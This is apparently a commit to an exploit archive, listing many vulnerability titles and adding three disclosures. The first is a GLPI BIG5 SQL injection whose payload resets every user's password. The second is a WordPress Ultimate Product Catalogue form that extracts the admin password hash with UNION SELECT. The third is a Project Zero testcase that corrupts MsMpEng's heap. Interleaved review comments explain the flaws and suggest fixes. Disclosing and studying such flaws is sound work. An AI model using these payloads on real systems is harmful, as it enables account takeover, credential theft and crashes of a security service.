Multiple File Inclusions AutoDealer 1.0 / 2.0 - MSSQL Injection AutoDealer 1.0/2.0 - MSSQL Injection Openannuaire Openmairie Annuaire 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openannuaire Openmairie Annuaire 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Waibrasil - Remote File Inclusion / Local File Inclusion Waibrasil - Local/Remote File Inclusion Spaw Editor 1.0 / 2.0 - Arbitrary File 
Upload Spaw Editor 1.0/2.0 - Arbitrary File Upload PHP SETI@home Web monitor - (PHPsetimon) Remote File Inclusion / Local File Inclusion PHP SETI@home Web monitor - 'PHPsetimon' Local/Remote File Inclusion vBulletin(R) 3.8.6 - faq.php Information Disclosure vBulletin 3.8.6 - 'faq.php' Information Disclosure Open Realty 2.x / 3.x - Persistent Cross-Site Scripting Open Realty 2.x/3.x - Persistent Cross-Site Scripting vBulletin 3.8.4 / 3.8.5 - Registration Bypass vBulletin 3.8.4/3.8.5 - Registration Bypass vbShout 5.2.2 - Remote / Local File Inclusion vbShout 5.2.2 - Local/Remote File Inclusion Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload Zoopeer 0.1/0.2 - 'FCKeditor' Arbitrary File Upload xt:Commerce Shopsoftware 3 / 4 - 'FCKeditor' Arbitrary File Upload xt:Commerce Shopsoftware 3/4 - 'FCKeditor' Arbitrary File Upload CakePHP 1.3.5 / 1.2.8 - Unserialize() CakePHP 1.3.5/1.2.8 - 'Unserialize()' Exploit vBSEO 3.5.2 / 3.2.2 - Persistent Cross-Site Scripting via LinkBacks vBSEO Sitemap 2.5 / 3.0 - Multiple Vulnerabilities vBSEO 3.2.2/3.5.2 - Persistent Cross-Site Scripting via LinkBacks vBSEO Sitemap 2.5/3.0 - Multiple Vulnerabilities Geomi CMS 1.2 / 3.0 - SQL Injection Geomi CMS 1.2/3.0 - SQL Injection cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection cChatBox for vBulletin 3.6.8/3.7.x - SQL Injection Redmine SCM Repository 0.9.x / 1.0.x - Arbitrary Command Execution (Metasploit) Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execution (Metasploit) vBulletin - misc.php Template Name Arbitrary Code Execution (Metasploit) vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit) CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit (Metasploit) CakePHP 1.3.5/1.2.8 - Cache Corruption Exploit (Metasploit) SmarterMail 7.3 / 7.4 - Multiple Vulnerabilities SmarterMail 7.3/7.4 - Multiple Vulnerabilities WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution 
WebSVN 2.3.2 - Unproper Metacharacters Escaping exec() Remote Command Injection WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection LuxCal Web Calendar 2.4.2 / 2.5.0 - SQL Injection LuxCal Web Calendar 2.4.2/2.5.0 - SQL Injection Joomla! Component 'com_virtuemart' 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit) Joomla! Component 'com_virtuemart' 1.1.7/1.5 - Blind Time-Based SQL Injection (Metasploit) WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution WSN Classifieds 6.2.12/6.2.18 - Multiple Vulnerabilities Family Connections CMS 2.5.0/2.7.1 - 'less.php' Remote Command Execution Typo3 4.5 < 4.7 - Remote Code Execution (Remote File Inclusion / Local File Inclusion) Typo3 4.5 < 4.7 - Remote Code Execution / Local File Inclusion / Remote File Inclusion phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit) phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XXE Injection (Metasploit) Log1 CMS - writeInfo() PHP Code Injection (Metasploit) Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit) MiniCMS 1.0 / 2.0 - PHP Code Inject MiniCMS 1.0/2.0 - PHP Code Injection 4Images 1.7.6-9 - Cross-Site Request Forgery / Inject PHP Code 4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities FreePBX 2.9.0/2.10.0 - Multiple Vulnerabilities FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit) FreePBX 2.9.0/2.10.0 - 'callmenum' Remote Code Execution (Metasploit) Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection Woltlab Burning Board 2.2/2.3 [WN]KT KickTipp 3.1 - SQL Injection SugarCRM CE 6.3.1 - Unserialize() PHP Code Execution (Metasploit) webERP 4.08.1 - Local / Remote File Inclusion SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution (Metasploit) webERP 4.08.1 - Local/Remote File Inclusion Tiki Wiki CMS Groupware 8.3 - Unserialize() PHP 
Code Execution (Metasploit) Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit) House Style 0.1.2 - readfile() Local File Disclosure House Style 0.1.2 - 'readfile()' Local File Disclosure OTRS Open Technology Real Services 3.1.8 / 3.1.9 - Cross-Site Scripting OTRS Open Technology Real Services 3.1.8/3.1.9 - Cross-Site Scripting ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Persistent Cross-Site Scripting ServersCheck Monitoring Software 9.0.12/9.0.14 - Persistent Cross-Site Scripting airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection airVisionNVR 1.1.13 - 'readfile()' Disclosure / SQL Injection Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities Kerio Control Unified Threat Management 9.1.0 build 1087/9.1.1 build 1324 - Multiple Vulnerabilities IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection Alt-N MDaemon 12.5.6/13.0.3 - Email Body HTML/JS Injection parachat 5.5 - Directory Traversal Parachat 5.5 - Directory Traversal DCP-Portal 3.7/4.x/5.x - calendar.php Multiple Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'calendar.php' Multiple Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - announcement.php cid Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - news.php cid Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - contents.php cid Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'announcement.php' 'cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'news.php' 'cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'contents.php' 'cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - calendar.php HTTP Response Splitting DCP-Portal 3.7/4.x/5.x - 'calendar.php' HTTP Response Splitting UBBCentral UBB.Threads 6.2.3/6.5 - showflat.php Cat Parameter Cross-Site Scripting UBBCentral UBB.Threads 
6.2.3/6.5 - calendar.php Cat Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' Cat Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - online.php Cat Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php' 'Cat' Parameter Cross-Site Scripting phpVms Virtual Airline Administration 2.1.934 / 2.1.935 - SQL Injection phpVms Virtual Airline Administration 2.1.934/2.1.935 - SQL Injection phpMyAdmin 3.5.8 / 4.0.0-RC2 - Multiple Vulnerabilities phpMyAdmin 3.5.8/4.0.0-RC2 - Multiple Vulnerabilities UBBCentral UBB.Threads 6.0 - editpost.php SQL Injection UBBCentral UBB.Threads 6.0 - 'editpost.php' SQL Injection Wifi Photo Transfer 2.1 / 1.1 PRO - Multiple Vulnerabilities Wifi Photo Transfer 2.1/1.1 PRO - Multiple Vulnerabilities File Lite 3.3 / 3.5 PRO iOS - Multiple Vulnerabilities File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities IPB (Invision Power Board) 1.x? 
/ 2.x / 3.x - Admin Account Takeover IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover UBBCentral 6.0 - UBB.threads Printthread.php SQL Injection UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x / 7.x) - Persistent Cross-Site Scripting Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation SPIP - CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation YaPiG 0.9x - Remote File Inclusion / Local File Inclusion YaPiG 0.9x - Local/Remote File Inclusion UBBCentral UBB.Threads 5.5.1/6.x - download.php Number Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - calendar.php Multiple Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - modifypost.php Number Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - viewmessage.php message Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - addfav.php main Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - notifymod.php Number Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - grabnext.php posted Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'download.php' 'Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php' 'Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php' 'message' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php' 'main' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php' 'Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php' 'posted' Parameter SQL Injection Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion Cuppa CMS - 'alertConfigField.php' Local/Remote File Inclusion Xibo 1.2.2 / 1.4.1 - 'index.php' p Parameter Directory Traversal Xibo 1.2.2/1.4.1 - 'index.php' p Parameter 
Directory Traversal UBB.Threads 6.3 - showflat.php SQL Injection UBBCentral UBB.Threads 6.3 - 'showflat.php' SQL Injection Virtual Hosting Control System 2.2/2.4 - 'login.php' check_login() Function Authentication Bypass Virtual Hosting Control System 2.2/2.4 - 'login.php' 'check_login()' Function Authentication Bypass ATutor 1.5.x - admin/fix_content.php submit Parameter Cross-Site Scripting ATutor 1.5.x - 'admin/fix_content.php' 'submit' Parameter Cross-Site Scripting Mirapoint Web Mail - Expression() HTML Injection Mirapoint Web Mail - 'Expression()' HTML Injection Onpub CMS 1.4 / 1.5 - Multiple SQL Injections Onpub CMS 1.4/1.5 - Multiple SQL Injections ImpressPages CMS 3.6 - manage() Function Remote Code Execution ImpressPages CMS 3.6 - 'manage()' Function Remote Code Execution Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusion Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass (Metasploit) Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit) UBB.Threads 6.1.1 - UBBThreads.php SQL Injection UBBCentral UBB.Threads 6.1.1 - 'UBBThreads.php' SQL Injection WHMCompleteSolution (WHMCS) 4.x / 5.x - Multiple Web Vulnerabilities WHMCompleteSolution (WHMCS) 4.x/5.x - Multiple Web Vulnerabilities Jenkins 1.523 - Inject Persistent HTML Code Jenkins 1.523 - Persistent HTML Code CTERA 3.2.29.0 / 3.2.42.0 - Persistent Cross-Site Scripting CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection UBBCentral UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection Drupal < 6.16 / 5.22 - Multiple Vulnerabilities Drupal < 5.22/6.16 - Multiple Vulnerabilities AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion AdvertisementManager 3.1 - 'req' Parameter Local/Remote File Inclusion Ultra Electronics 7.2.0.19 / 7.4.0.7 - Multiple Vulnerabilities Ultra Electronics 
7.2.0.19/7.4.0.7 - Multiple Vulnerabilities net2ftp 0.98 (stable) - 'admin1.template.php' Local File Inclusion / Remote File Inclusion net2ftp 0.98 (stable) - 'admin1.template.php' Local/Remote File Inclusion MyBB 1.8.2 - unset_globals() Function Bypass / Remote Code Execution MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code Execution WordPress Plugin Spellchecker 3.1 - 'general.php' Local File Inclusion / Remote File Inclusion WordPress Plugin Spellchecker 3.1 - 'general.php' Local/Remote File Inclusion Pimcore 3.0 / 2.3.0 CMS - SQL Injection phpList 3.0.6 / 3.0.10 - SQL Injection Pimcore 2.3.0/3.0 CMS - SQL Injection phpList 3.0.6/3.0.10 - SQL Injection Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email Guppy CMS 5.0.9/5.00.10 - Authentication Bypass/Change Email UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting UBBCentral UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting OSClass 2.3.3 - 'index.php' getParam() Function Multiple Parameter Cross-Site Scripting OSClass 2.3.3 - 'index.php' 'getParam()' Function Multiple Parameter Cross-Site Scripting OpenEMR 4.1 - 'Interface/fax/fax_dispatch.php' File Parameter exec() Call Arbitrary Shell Command Execution OpenEMR 4.1 - 'Interface/fax/fax_dispatch.php' File Parameter 'exec()' Call Arbitrary Shell Command Execution Fork CMS 3.x - backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display Cross-Site Scripting Fork CMS 3.x - 'backend/modules/error/actions/index.php' 'parse()' Function Multiple Parameter Error Display Cross-Site Scripting DedeCMS < 5.7-sp1 - Remote File Inclusion DeDeCMS < 5.7-sp1 - Remote File Inclusion WK UDID 1.0.1 iOS - Command Inject WK UDID 1.0.1 iOS - Command Injection MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion MindTouch DekiWiki - Multiple Local/Remote File Inclusions PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function 
Western Digital My Cloud 04.01.03-421 / 04.01.04-422 - Command Injection Western Digital My Cloud 04.01.03-421/04.01.04-422 - Command Injection Belkin Router N150 1.00.08 / 1.00.09 - Directory Traversal Belkin Router N150 1.00.08/1.00.09 - Directory Traversal b374k Web Shell 3.2.3 / 2.8 - Cross-Site Request Forgery / Command Injection b374k Web Shell 3.2.3/2.8 - Cross-Site Request Forgery / Command Injection CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion CakePHP 2.2.8/2.3.7 - AssetDispatcher Class Local File Inclusion AlegroCart 1.2.8 - Local File Inclusion / Remote File Inclusion AlegroCart 1.2.8 - Local/Remote File Inclusion HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection HumHub 0.11.2/0.20.0-beta.2 - SQL Injection xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion xBoard 5.0/5.5/6.0 - 'view.php' Local File Inclusion qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion qEngine 4.1.6/6.0.0 - 'task.php' Local File Inclusion Atlassian Confluence 5.2 / 5.8.14 / 5.8.15 - Multiple Vulnerabilities Atlassian Confluence 5.2/5.8.14/5.8.15 - Multiple Vulnerabilities dotDefender Firewall 5.00.12865 / 5.13-13282 - Cross-Site Request Forgery dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery Chamilo LMS IDOR - (messageId) Delete POST Inject Chamilo LMS IDOR - 'messageId' Delete POST Injection WordPress Plugin Site Import 1.0.1 - Local File Inclusion / Remote File Inclusion WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion WordPress Plugin Brandfolder 3.0 - Remote File Inclusion / Local File Inclusion WordPress Plugin Brandfolder 3.0 - Local/Remote File Inclusion PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities PQI Air Pen Express 6W51-0000R2/6W51-0000R2XXX - Multiple Vulnerabilities Novell ServiceDesk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities Novell ServiceDesk 6.5/7.0.3/7.1.0 - Multiple Vulnerabilities Totemomail 4.x / 5.x - Persistent Cross-Site Scripting Totemomail 4.x/5.x - 
Persistent Cross-Site Scripting Tiki Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution Tiki Wiki CMS Calendar 6.15/9.11 LTS/12.5 LTS/14.2 - Remote Code Execution Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload Relay Ajax Directory Manager relayb01-071706/1.5.1/1.5.3 - Unauthenticated Arbitrary File Upload Untangle NGFW 12.1.0 Beta - execEvil() Command Injection Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection GSX Analyzer 10.12 / 11 - 'main.swf' Hard-Coded Superadmin Credentials GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials Micro Focus Filr 2 2.0.0.421 / 1.2 1.2.0.846 - Multiple Vulnerabilities Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi Filename Remote Code Execution Trend Micro Deep Discovery 3.7/3.8 SP1 (3.81)/3.8 SP2 (3.82) - 'hotfix_upload.cgi' Filename Remote Code Execution WebNMS Framework Server 5.2 / 5.2 SP1 - Multiple Vulnerabilities WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities Zabbix 2.2.x / 3.0.x - SQL Injection Zabbix 2.2.x/3.0.x - SQL Injection Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection Lepton CMS 2.2.0/2.2.1 - Directory Traversal Lepton CMS 2.2.0/2.2.1 - PHP Code Injection RSS News AutoPilot Script 1.0.1 / 3.1.0 - Admin Panel Authentication Bypass RSS News AutoPilot Script 1.0.1/3.1.0 - Admin Panel Authentication Bypass Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal SPIP 3.1.1/3.1.2 - File Enumeration / Path Traversal WordPress Plugin Quiz And Survey Master 4.5.4 / 4.7.8 - Cross-Site Request Forgery WordPress Plugin Quiz And Survey Master 4.5.4/4.7.8 - Cross-Site 
Request Forgery Zoneminder 1.29 / 1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery RSS News AutoPilot Script 1.0.1/3.0.3 - Cross-Site Request Forgery Solare Datensysteme Solar-Log Devices 2.8.4-56 / 3.5.2-85 - Multiple Vulnerabilities Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit) OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit) OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit) OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit) Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit) Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit) Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution Horde Groupware Webmail 3/4/5 - Multiple Remote Code Execution Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities Alerton Webtalk 2.5/3.3 - Multiple Vulnerabilities I_ Librarian 4.6 / 4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting GLPI 0.90.4 - SQL Injection WordPress Plugin Ultimate Product Catalogue 4.2.2 - SQL Injection
parent
40b350e820
commit
28b54c9669
5 changed files with 1099 additions and 743 deletions
55
platforms/php/webapps/42262.txt
Executable file
|
@ -0,0 +1,55 @@
|
|||
# Exploit Title: Multiple SQL injection vulnerabilities in GLPI 0.90.4
|
||||
# Date: 2016/09/09
|
||||
# Exploit Author: Eric CARTER (in/ericcarterengineer - CS c-s.fr)
|
||||
# Vendor Homepage: http://glpi-project.org
|
||||
# Software Link: http://glpi-project.org/spip.php?article3
|
||||
# Version: 0.90.4
|
||||
# Tested on: GLPI 0.90.4 running on a Debian 7, Apache 2.2.2, MySQL 5.5.49
|
||||
# CVE : CVE-2016-7508
|
||||
|
||||
Multiple SQL injection vulnerabilities in GLPI 0.90.4 allow an
|
||||
authenticated remote attacker to execute arbitrary SQL commands by
|
||||
using the [ELIDED] character when the database is configured to use
|
||||
asian encoding (BIG 5).
|
||||
|
||||
|
||||
|
||||
> [Affected Component]
|
||||
The file ./inc/dbmysql.class.php defines the encoding the database
|
||||
should use. This files uses the "SET NAMES" function which offers the
|
||||
possibility to use a specific encoding.
|
||||
|
||||
> [Attack Type]
|
||||
Remote
|
||||
|
||||
> [Impact Code execution]
|
||||
True
|
||||
|
||||
> [Impact Escalation of Privileges]
|
||||
True
|
||||
|
||||
> [Impact Information Disclosure]
|
||||
True
|
||||
|
||||
> [Prerequisite]
|
||||
The administrator of GLPI must have defined the variable
|
||||
$dbenc='big5' in ./config/config_db.php to support asian encoding. It
|
||||
will then be possible to do SQL injection in almost all the forms of
|
||||
the application.
|
||||
|
||||
> [Attack Vectors]
|
||||
For the proof-of-concept, the attacker targeted the
|
||||
"Surname" form input in the User profile by adding the characters
|
||||
ø (\xBF\x27) before the SQL code (the request must be sent using Western
|
||||
encoding) :
|
||||
ø', password=61529519452809720693702583126814 -- x
|
||||
|
||||
Once received by the server, the request will be sanitized, giving :
|
||||
ø\', password=61529519452809720693702583126814 -- x
|
||||
|
||||
The value will then be sent to the database with a BIG5 encoding. Here is the
|
||||
critical point, as BIG5 will see the string ø\ as a single asian character
|
||||
encoded on two bytes. As the single quote isn't escaped anymore, the
|
||||
SQL code will be executed and will set the password of every accounts
|
||||
to the value
|
||||
61529519452809720693702583126814 (=MD5 hash of "ximaz" string)
|
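Review bot: The "Affected Component" paragraph names `SET NAMES` as the culprit but never says why that defeats the sanitization shown under "Attack Vectors", which is the point a defender needs: `SET NAMES` tells the server which charset the connection uses, but the client-side escaping routine keeps working in its own default charset, so the backslash it inserts before the quote is consumed by the server as the second byte of a two-byte BIG5 character. That also sharpens the remediation, which the advisory omits: setting the charset through the client API (`mysqli_set_charset()`) or using prepared statements keeps the escaper and the server in agreement, whereas merely not setting `$dbenc='big5'` only removes the trigger. The escaping call itself is not shown here, so this is the standard multibyte-escape explanation rather than something verified against GLPI's source. A line naming the version that fixes CVE-2016-7508 would also help triage, since only 0.90.4 is listed.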
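--- a/platforms/php/webapps/42263.txt
+++ b/platforms/php/webapps/42263.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection – Plugin WordPress – Sql Injection
+# Exploit Author: Lenon Leite
+# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
+
+# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 4.2.2
+# Tested on: Ubuntu 16.04
+
+1 - Description:
+
+Type user access: register user.
+
+$_POST[‘CatID’] is not escaped.
+
+http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/
+
+2 - Proof of Concept:
+
+1 – Login as regular user (created using wp-login.php?action=register):
+
+2 – Using:
+
+<*form method="post"
+action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
+<*input type="text" name="CatID" value="0 UNION SELECT
+user_login,user_pass FROM wp_users WHERE ID=1">
+<*input type="submit">
+
+*delete “*” in code*
+
+3 - Timeline:
+
+- 22/05/2017 – Discovered
+- 24/05/2017 – Vendor not finded
+- **/06/2017 - Corrected
+
+***Rename plugin txt to zip. Problem with gmail block.
+--
+*Atenciosamente*
+
+*Lenon Leite*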
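Review bot: The PoC payload `0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1` rests on two assumptions the advisory does not state and a reader adapting it must know: the default `wp_` table prefix, and the vulnerable query selecting exactly two columns so the UNION is accepted. The description stops at `$_POST['CatID'] is not escaped`; naming the expected remediation — cast the value to an integer, or pass it through `$wpdb->prepare()` with a `%d` placeholder — would let readers recognise a patched `get_upcp_subcategories` handler instead of re-testing blind, especially since the "Corrected" timeline entry gives no fixed version. The privilege needed is only implied by "Type user access: register user"; saying explicitly that any account able to log in reaches the `admin-ajax.php` action, as that line suggests, would make the risk rating clearer.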
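--- a/platforms/windows/dos/42264.txt
+++ b/platforms/windows/dos/42264.txt
@@ -0,0 +1,162 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2
+
+In issue 1260 I discussed Microsoft's "apicall" instruction that can invoke a large number of internal emulator apis and is exposed to remote attackers by default in all recent versions of Windows. I asked Microsoft if this was intentionally exposed, and they replied "The apicall instruction is exposed for multiple reasons", so this is intentional.
+
+This full system x86 emulator runs as SYSTEM, is unsandboxed, is enabled by default and remotely accessible to attackers.
+
+I took a quick stab at writing a fuzzer and immediately found heap corruption in the KERNEL32.DLL!VFS_Write API, I suspect this has never been fuzzed before. A minimal testcase would be something like this:
+
+int main(int argc, char **argv)
+{
+MpApiCall("NTDLL.DLL", "NtControlChannel", 0xA); // Disable apicall limit
+
+for (int i = 0; i < 16; i++) {
+MpApiCall("NTDLL.DLL", "VFS_Open", (uint64_t) L"filename", 0);
+MpApiCall("NTDLL.DLL", "VFS_Write", i, (uint64_t) "data", 0, 0);
+MpApiCall("NTDLL.DLL", "VFS_Write", i, (uint64_t) "data", -1, 0);
+}
+
+return 0;
+}
+
+I suspect the MutableByteStream object getting corrupted with an unchecked memcpy, I've seen multiple different stacktraces including wild eip.
+
+See attachment for MpApiCall() implementation, and pre-compiled testcase, renamed testcase.txt. Note that as soon as the testcase.txt file touches disk, it will immediately crash the MsMpEng service on Windows, which may destabilize your system. The testcases have been encrypted to prevent crashing your exchange server.
+
+This bug was found on Linux using Address Sanitizer:
+
+$ ./mpclient extra/testcase.exe
+main(): Scanning extra/testcase.exe...
+EngineScanCallback(): Scanning input
+*** Error in `./mpclient': free(): invalid pointer: 0x0a5b4e50 ***
+Aborted (core dumped)
+
+Then verified on Windows in MsMpEng.exe:
+
+Critical error detected c0000374
+Break instruction exception - code 80000003 (first chance)
+ntdll!RtlReportCriticalFailure+0x29:
+001b:76fc3b6d cc int 3
+2: kd> kv
+ChildEBP RetAddr Args to Child
+0192e638 76fc4acd c0000374 76fdedd8 0192e67c ntdll!RtlReportCriticalFailure+0x29 (FPO: [Non-Fpo])
+0192e648 76fc4bad 00000002 777482b4 11109bb0 ntdll!RtlpReportHeapFailure+0x21 (FPO: [Non-Fpo])
+0192e67c 76f8a1dc 0000000c 00370000 11109bb0 ntdll!RtlpLogHeapFailure+0xa1 (FPO: [Non-Fpo])
+0192e76c 76f55950 0000cc5c 0000cc68 003700c4 ntdll!RtlpAllocateHeap+0x7b2 (FPO: [Non-Fpo])
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for mpengine.dll -
+0192e7f0 66ac184e 00370000 00000008 0000cc5c ntdll!RtlAllocateHeap+0x23a (FPO: [Non-Fpo])
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0192e808 668b60ef 0000cc5c 00000001 0cb26e40 mpengine!FreeSigFiles+0x1cb14e
+0192e858 6682c1a7 94741586 0cb26e40 11069948 mpengine!_rsignal+0x3479f
+0192e880 668266f5 947414e2 00000000 0192eb34 mpengine+0x20c1a7
+0192e9e4 668251ce 0192eb34 0cb26e40 00001000 mpengine+0x2066f5
+0192ea38 66822fd1 0cb26e40 109ee478 00001000 mpengine+0x2051ce
+0192eab0 66823127 0192eae0 0192eb34 00000000 mpengine+0x202fd1
+0192eba8 66822d18 0192ec00 0192ec54 00000000 mpengine+0x203127
+0192ec70 66823533 0192ec98 110c02e0 947411c2 mpengine+0x202d18
+0192ecc4 668244b5 110c02e0 947411fa 106bde30 mpengine+0x203533
+0192ecfc 66824593 110c02e0 94741382 00000000 mpengine+0x2044b5
+0192ee84 6682085f 0192f7dc 00000000 003e7cd8 mpengine+0x204593
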